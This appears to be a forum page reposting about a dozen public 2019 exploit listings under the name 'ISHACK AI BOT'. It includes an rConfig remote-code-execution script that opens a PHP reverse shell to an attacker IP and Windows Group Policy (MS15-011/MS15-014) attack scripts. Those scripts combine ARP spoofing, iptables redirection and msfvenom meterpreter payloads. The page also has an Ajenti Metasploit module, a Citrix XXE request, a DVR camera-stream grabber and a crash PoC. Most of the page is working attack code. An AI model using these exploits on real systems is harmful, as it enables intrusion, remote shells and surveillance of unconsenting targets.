ISHACK AI BOT 发布的所有帖子

  1. # Exploit Title: rConfig 3.9.2 - Remote Code Execution # Date: 2019-09-18 # Exploit Author: Askar # Vendor Homepage: https://rconfig.com/ # Software link: https://rconfig.com/download # Version: v3.9.2 # Tested on: CentOS 7.7 / PHP 7.2.22 # CVE : CVE-2019-16662 #!/usr/bin/python import requests import sys from urllib import quote from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) != 4: print "[+] Usage : ./exploit.py target ip port" exit() target = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port)) install_path = target + "/install" req = requests.get(install_path, verify=False) if req.status_code == 404: print "[-] Installation directory not found!" print "[-] Exploitation failed !" exit() elif req.status_code == 200: print "[+] Installation directory found!" url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload print "[+] Triggering the payload" print "[+] Check your listener !" requests.get(url_to_send, verify=False) rConfig-preauth.png
  2. # Exploit Title: Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path # Discovery Date: 2019-10-28 # Exploit Author: Alberto Vargas # Vendor Homepage: https://www.issivs.com/product-detail/secure-os-enterprise/ # Software Link: https://www.issivs.com/schedule-a-free-demo/(trial version for unlicensed users) # Version: 10.2 R1 # Tested on: Windows 10 Pro x64 Esp # Version: 10.0.18362 # Schedule A Free Demo - ISS - Intelligent Security Systems<https://www.issivs.com/schedule-a-free-demo/> # Schedule a Free Demo A leading developer of security surveillance and control systems for # networked digital video and audio recording, video image pattern processing and digital data transmission. # www.issivs.com # Summary: ISS’ global standard for video management, access control and video analytics, SecurOS™ Enterprise is perfectly suited for # managing large and demanding installations. The Enterprise framework can manage and monitor an unlimited number of cameras and devices, apply # intelligent video analytics, and act as an integration platform for a variety of 3rd party systems. Built to handle enterprise level deployments, # SecurOS Enterprise, comes with built-in Native Failure functionality, Microsoft Active Directory / LDAP integration, and has an extensive set # of Cybersecurity features making it one of the most reliable and secure video management platforms in the market today. SecurOS Enterprise # supports all the features of the other 3 editions. # Description: The application suffers from an unquoted search path issue impacting the service 'SecurosCtrlService'. This could potentially allow an # authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 
A successful attempt would require # the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges # of the application. # Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ SecurOS Control Service SecurosCtrlService C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe Auto # Service info: C:\Users\user>sc qc SecurosCtrlService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SecurosCtrlService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : SecurOS Control Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  3. # Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution # Date: 2019-10-28 # Exploit Author: Thomas Zuk # Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, # Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1 # Tested on: Windows 7 , Windows Server 2012 # CVE : CVE-2015-0008 # Type: Remote # Platform: Windows # Description: While there exists multiple advisories for the vulnerability and video demos of # successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code # targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level # remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys). #!/usr/bin/python3 import argparse import os import subprocess import socket import fcntl import struct # MS15-011 Exploit. # For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011 # Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1 # Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1 # Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy. 
def arpSpoof(interface, hostIP, targetIP): arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP) arpArgs = arpCmd.split() print("Arpspoofing: %s" % (arpArgs)) p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) def karmaSMB(hostIP): print("reverting GptTmpl.inf from bak") os.system("cp GptTmpl.inf.bak GptTmpl.inf") appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP) CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP) f = open("GptTmpl.inf","a", encoding='utf-16le') f.write(appInit) f.write(CURunKey) f.close() path = os.getcwd() fConfig = open("smb.conf","w") fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n") fConfig.close() karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ " os.system(karmaCmd) def iptables_config(targetIP, hostIP): print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward') print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP)) print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP)) print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE') os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP)) os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP)) os.system('iptables -t nat -A POSTROUTING -j MASQUERADE') def get_interface_address(ifname): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 
'utf-8')))[20:24]) def generatePayload(lhost, lport): print("generating payload(s) and metasploit resource file") msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport) os.system(msfDll) msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport) print("metasploit resource script: %s" % msfResource) print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically") file = open("meta_resource.rc", "w+") file.write(msfResource) file.close() if __name__ == '__main__': parser = argparse.ArgumentParser() # Add arguments parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True) parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True) parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True) parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False) parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False) args = parser.parse_args() # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files. print ("checking for missing file(s)") if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"): print("Requirements missing. 
Downloading required files from github") os.system("git clone https://github.com/Freakazoidile/MS15-011-Files") os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/") # Get the provided interfaces IP address ipAddr = get_interface_address(args.interface) if args.lhost is not None: lhost = args.lhost else: lhost = ipAddr if args.lport is not None: lport = args.lport else: lport = '4444' dcSpoof = "" dcCommaList = "" count = 0 # loop over the domain controllers, poison each and target the host IP # create a comma separated list of DC's # create a "-t" separate list of DC's for use with arpspoof for dc in args.domain_controller: dcSpoof += "-t %s " % (dc) if count > 0: dcCommaList += ",%s" % (dc) else: dcCommaList += "%s" % (dc) arpSpoof(args.interface, dc, "-t %s" % (args.target_ip)) count += 1 # arpspoof the target and all of the DC's arpSpoof(args.interface, args.target_ip, dcSpoof) # generate payloads generatePayload(lhost, lport) # Setup iptables forwarding rules iptables_config(args.target_ip, ipAddr) #run Karmba SMB Server karmaSMB(ipAddr) print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers)) print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")
  4. # Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing # Date: 2019-10-28 # Exploit Author: Milad Khoshdel # Software Link: https://wordpress.org/download/ # Version: Wordpress 5.2.4 # Tested on: Linux Apache/2 PHP/7.2 # Vulnerable Page: https://[Your-Domain]/wp-json # POC: # The web application fails to properly validate the Origin header (check Details section for more information) # and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue # requests made with user credentials and read the responses to these requests. Trusting arbitrary # origins effectively disables the same-origin policy, allowing two-way interaction by third-party websites. # REQUEST --> GET /wp-json/ HTTP/1.1 Origin: https://www.evil.com Accept: */* Accept-Encoding: gzip,deflate Host: [Your-Domain] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Connection: Keep-alive # RESPONSE --> HTTP/1.1 200 OK Date: Mon, 28 Oct 2019 07:34:39 GMT Server: NopeJS X-Robots-Tag: noindex Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages Access-Control-Allow-Headers: Authorization, Content-Type Allow: GET Access-Control-Allow-Origin: https://www.evil.com Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE Access-Control-Allow-Credentials: true Vary: Origin,Accept-Encoding,User-Agent Keep-Alive: timeout=2, max=73 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8 Original-Content-Encoding: gzip Content-Length: 158412
  5. # Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass # Date: 2019-10-28 # Exploit Author: Thomas Zuk # Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, # Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1 # Tested on: Windows 7 , Windows Server 2012 # CVE : CVE-2015-0009 # Type: Remote # Platform: Windows # Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes # the target system to revert various security settings to their default settings. This includes SMB server # and network client settings, which by default do not require SMB signing except for domain controllers. # Successful exploitation against a system with a hardened configuration that requires SMB Signing by the # network client will make the target system vulnerable to MS15-011, which can lead to remote code execution. #!/usr/bin/python3 import argparse import fcntl import os import socket import struct import subprocess from subprocess import PIPE import re # MS15-014 Exploit. # For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-014 # Example usage: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1 # Example usage with multiple DC's: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1 # Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy. def arpSpoof(interface, hostIP, targetIP): arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP) arpArgs = arpCmd.split() print("Arpspoofing: %s" % (arpArgs)) p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) def corrupt_packet(): global count # NetSed listen port 446 (iptables redirected), modify traffic, then forward to destination 445. 
netsedCmd = "netsed tcp 446 0 445 s/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00%00" #>/dev/null 2>&1 & netsedArgs = netsedCmd.split() print("Starting NetSed!") print("NetSed: %s" % (netsedArgs)) netsedP = subprocess.Popen(netsedArgs, stdout=PIPE, stderr=subprocess.STDOUT) while True: o = (netsedP.stdout.readline()).decode('utf-8') if o != '': if args['verbose']: print("NetSed output: %s" % o) if re.search('Applying rule', o) is not None: count += 1 print('packet corrupted: % s' % count) # During testing, after 4 attempts to retrieve GptTmpl.inf the exploit was successful. Sometimes the machine requested the file 7 times, but exploitation was always successful after 4 attempts. # The script waits for up to 7 for reliability. Tested on Windows 7 SP1 and Server 2012 R2 if count == 4: print("Exploit has likely completed!! waiting for up to 7 corrupted packets for reliability. \nIf no more packets are corrupted in the next couple of minutes kill this script. The target should be reverted to default settings with SMB signing not required on the client. \nTarget can now be exploited with MS15-011 exploit.") #During testing, after 7 attempts to retrieve GptTmpl.inf the GPO update stopped and exploitation was successful. 
if count == 7: break def get_interface_address(ifname): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24]) def iptables_config(targetIP, hostIP): #allow forwarding, redirect arpspoofed traffic from dport 445 to 446 for NetSed. print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward') print('[+] Running command: iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446') print('[+] Make sure to cleanup iptables after exploit completes') os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') os.system('iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446') if __name__ == '__main__': parser = argparse.ArgumentParser(description='Find the SecEdit\GptTmpl.inf UUID to exploit MS15-014') parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-014", required=True) parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True) parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True) parser.add_argument("-v", "--verbose", help="Toggle verbose mode. 
displays all output of NetSed, very busy terminal if enabled.", action='store_true') args = vars(parser.parse_args()) target_ip = args['target_ip'] count = 0 # Get the provided interfaces IP address ipAddr = get_interface_address(args['interface']) dcSpoof = "" dcCommaList = "" dcCount = 0 # loop over the domain controllers, poison each and target the host IP # create a comma separated list of DC's # create a "-t" separate list of DC's for use with arpspoof for dc in args['domain_controller']: dcSpoof += "-t %s " % (dc) if dcCount > 0: dcCommaList += ",%s" % (dc) else: dcCommaList += "%s" % (dc) arpSpoof(args['interface'], dc, "-t %s" % (target_ip)) dcCount += 1 # arpspoof the target and all of the DC's arpSpoof(args['interface'], target_ip, dcSpoof) # Setup iptables forwarding rules iptables_config(target_ip, ipAddr) #identify requests for GptTmpl.inf and modify the packet to corrupt it using NetSed. corrupt_packet()
  6. # Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit) # Date: 2019-10-29 # Exploit Author: Onur ER # Vendor Homepage: http://ajenti.org/ # Software Link: https://github.com/ajenti/ajenti # Version: 2.1.31 # Tested on: Ubuntu 19.10 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => "Ajenti 2.1.31 Remote Code Execution", 'Description' => %q{ This module exploits a command injection in Ajenti <= 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned. }, 'Author' => [ 'Jeremy Brown', # Vulnerability discovery 'Onur ER <[email protected]>' # Metasploit module ], 'References' => [ ['EDB', '47497'] ], 'DisclosureDate' => '2019-10-14', 'License' => MSF_LICENSE, 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'Privileged' => false, 'Targets' => [ [ 'Ajenti <= 2.1.31', {} ] ], 'DefaultOptions' => { 'RPORT' => 8000, 'SSL' => 'True', 'payload' => 'python/meterpreter/reverse_tcp' }, 'DefaultTarget' => 0 )) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => "/view/login/normal" }) if res and res.code == 200 if res.body =~ /'ajentiVersion', '2.1.31'/ return Exploit::CheckCode::Vulnerable elsif res.body =~ /Ajenti/ return Exploit::CheckCode::Detected end end vprint_error("Unable to determine due to a HTTP connection timeout") return Exploit::CheckCode::Unknown end def exploit print_status("Exploiting...") random_password = rand_text_alpha_lower(7) json_body = { 'username' => "`python -c \"#{payload.encoded}\"`", 'password' => random_password, 'mode' => 'normal' } res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'), 'ctype' 
=> 'application/json', 'data' => JSON.generate(json_body) }) end end
  7. # Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection # Date: 2019-08-28 # Exploit Author: Vahagn Vardanya # Vendor Homepage:https://www.citrix.com/downloads/storefront/ # Software Link: https://support.citrix.com/article/CTX251988 # Version: # Citrix StoreFront Server earlier than 1903 # Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000) # Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)# # Tested on: Windows # Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb # PoC POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1 Content-Type: application/vnd.citrix.requesttoken+xml Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd. citrix.authenticateresponse-1+xml Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 X-Forwarded-For: 192.168.204.1 X-Citrix-Agent: crm. 
X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image X-Citrix-IsUsingHTTPS: No Host: 192.168.204.131 Content-Length: 331 Expect: 100-continue <?xml version="1.0" encoding="utf-8" standalone='no'?><!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://REMOTE">%xxe; ]><requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken "><for-service>a</for-service><for-service-url>http://secure-web.cisco.com/ <http://secure-web.cisco.com/1ijL9Cycthe9FsmytQkHCl1Xg9pMufEcuz0PmzFHVwkbFjSep42bW3GRBkLUxePJTdOcYeHl5hlVi95aQc-F0KUuqpBKFdx4EXJ_ppx3MY000cALA2hGugGjMX3hbmvhtPOTba7B4LnAcpuyFDLHiSlv8xyu_CzN0mhekRY51L34p4Wy9oMguR9Bj8YWAm6KxixMl1DiaZ88h4FVR0vKzHdtedNF63xO329dQAtQuVWiipK_rt4rnVWKmorTTrbp-bsdV7zUBsqjON-MZYpzagQ/http%3A%2F%2F192.168.204.146%2FCitrix%2Fstore_nameAuth%2Fauth%2Fv1%2Ftoken></for-service-url><reqtokentemplate /><requested-lifetime>0.08:00:00</requested-lifetime></requesttoken>
  8. # Title: iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure # Date: 2019-10-29 # Author: LiquidWorm # Vendor:iSeeQ # Link: http://www.iseeq.co.kr # CVE: N/A #!/bin/bash # # # iSeeQ Hybrid DVR WH-H4 1.03R / 2.0.0.P (get_jpeg) Stream Disclosure # # # Vendor: iSeeQ # Product web page: http://www.iseeq.co.kr # Affected version: WH-H4 1.03R / 2.0.0.P # # Summary: The 4/8/16 channel hybrid standalone DVR delivers high quality # pictures which adopts high performance video processing chips and embedded # Linux system. This advanced video digital platform is very useful to identify # an object from a long distance. # # Desc: The DVR suffers from an unauthenticated and unauthorized live stream # disclosure when get_jpeg script is called. # # Tested on: Boa/0.94.13 # PHP/7.0.22 # DVR Web Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2019-5539 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5539.php # # # 28.10.2019 # if [ "$#" -ne 2 ]; then echo "Usage: $0 IP:PORT CHANNEL" exit fi IP=$1 CHANNEL=$2 HOST="http://$IP/cgi-bin/get_jpeg?ch=$CHANNEL" STATUS=$(curl -Is http://$IP/cgi-bin/php/login.php 2>/dev/null | head -1 | awk -F" " '{print $2}') if [ "$STATUS" == "404" ]; then echo "Target not vulnerable!" exit fi echo "Collecting snapshots..." for x in {1..10}; do echo -ne $x curl "$HOST" -o seq-$x.jpg -#; sleep 0.8 done echo -ne "\nDone." echo -ne "\nRendering video..." ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i seq-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p clip.mp4 echo " done." echo -ne "\nRunning animation..." sleep 1 cvlc clip.mp4 --verbose -1 -f vlc://quit
  9. # Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service # Date: 2019-10-30 # Vendor Homepage:https://www.alloksoft.com/ # Software Link: https://www.alloksoft.com/wmv.htm # Exploit Author: Nithoshitha S # Tested Version: v4.6.1217 # Tested on: Windows 7 x64 # Windows XP SP3 # 1.- Run python code :poc.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey' # 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code' # 5.- Click 'OK' and you will see a crash. # poc.py #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  10. The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc): let notAGetterSetter = {whatever: 42}; function v2(v5) { const v10 = Object(); if (v5) { const v12 = {set:Array}; const v14 = Object.defineProperty(v10,"length",v12); const v15 = (140899729)[140899729]; } else { v10.length = notAGetterSetter; } const v18 = new Uint8ClampedArray(49415); v18[1] = v10; const v19 = v10.length; let v20 = 0; while (v20 < 100000) { v20++; } } const v26 = v2(); for (let v32 = 0; v32 < 1000; v32++) { const v33 = v2(true); } /* Crashes with: ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer<To>::type::info()) ../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *] 1 0x1111ada79 WTFCrash 2 0x1111ada99 WTFCrashWithSecurityImplication 3 0x10ffb8f55 JSC::GetterSetter* JSC::jsCast<JSC::GetterSetter*>(JSC::JSValue) 4 0x10ffaf820 JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::executeEffects(unsigned int, JSC::DFG::Node*) 5 0x10ff9f37b JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::execute(unsigned int) 6 0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*) 7 0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA() 8 0x10ff9d647 JSC::DFG::CFAPhase::run() 9 0x10ff9cc61 bool JSC::DFG::runAndLog<JSC::DFG::CFAPhase>(JSC::DFG::CFAPhase&) 10 0x10ff6c65b bool JSC::DFG::runPhase<JSC::DFG::CFAPhase>(JSC::DFG::Graph&) 11 0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&) 12 0x110279031 JSC::DFG::Plan::compileInThreadImpl() 13 0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*) 14 0x11052a9bb JSC::DFG::Worklist::ThreadBody::work() 15 0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const 16 0x1111b38a9 
WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call() 17 0x1102c433a WTF::Function<void ()>::operator()() const 18 0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) 19 0x111285525 WTF::wtfThreadEntryPoint(void*) 20 0x7fff5a7262eb _pthread_body 21 0x7fff5a729249 _pthread_start 22 0x7fff5a72540d thread_start */ The assertion indicates that a JSCell is incorrectly downcast to a GetterSetter [1] (a pseudo object used to implement property getters/setters). In non-debug builds, a type confusion then follows. Below is my preliminary analysis of the cause of the bug. The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it: # Block 0 (before if-else): 44: NewObject(...) <jump to block 1 or 2 depending on v5> # Block 1 (the if part): ... <install .length property on @44> // Code for const v15 = (140899729)[140899729]; ForceOSRExit Unreachable # Block 2 (the else part) PutByOffset @44, notAGetterSetter PutStructure # Block 3 (after the if-else): ... // Code for v10.length. Due to feedback from previous executions, DFG // JIT speculates that the if branch will be taken and that it will see // v10 with a GetterSetter for .length here CheckStructure @44, structureWithLengthBeingAGetterSetter 166: GetGetterSetterByOffset @44, .length // Load the GetterSetter object from @44 167: GetGetter @166 // Load the getter function from the GetterSetter ... Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout. 
Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]): * It determines that the GetGetterSetterByOffset node loads the named property from the object @44 * It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2) * This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1 * As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2). At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that. [1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43 [2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49 [3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51 [4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811
  11. # Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning # Date: 2019-10-30 # Exploit Author: Jacob Baines # Vendor Homepage: https://mikrotik.com/ # Software Link: https://mikrotik.com/download # Version: 6.45.6 Stable (and below) or 6.44.5 Long-term (and below) # Tested on: Various x86 and MIPSBE RouterOS installs # CVE : CVE-2019-3978 # Writeup: https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21 # Disclosure: https://www.tenable.com/security/research/tra-2019-46 # Unauthenticated DNS request via Winbox # RouterOS before 6.45.7 (stable) and 6.44.6 (Long-term) allowed an unauthenticated remote user to trigger DNS requests # to a user-specified DNS server via port 8291 (winbox). The DNS response then gets cached by RouterOS, setting up # a perfect situation for unauthenticated DNS cache poisoning. This is assigned CVE-2019-3978. # This PoC takes a target ip/port (router) and a DNS server (e.g. 8.8.8.8). # The PoC will always send a DNS request for example.com. In the following write-up, # I detail how to use this to poison the router's cache: # https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21 # Note that the write-up focuses on routers configured *without* the DNS server enabled. # Obviously this attack is significantly more powerful when downstream clients use the router as a DNS server. ## What are the build dependencies? # This requires: # * Boost 1.66 or higher # * cmake ## How do I build this jawn? # Just normal cmake. Try this: # ```sh # mkdir build # cd build # cmake .. # make # ``` # Resolve dependencies as needed. 
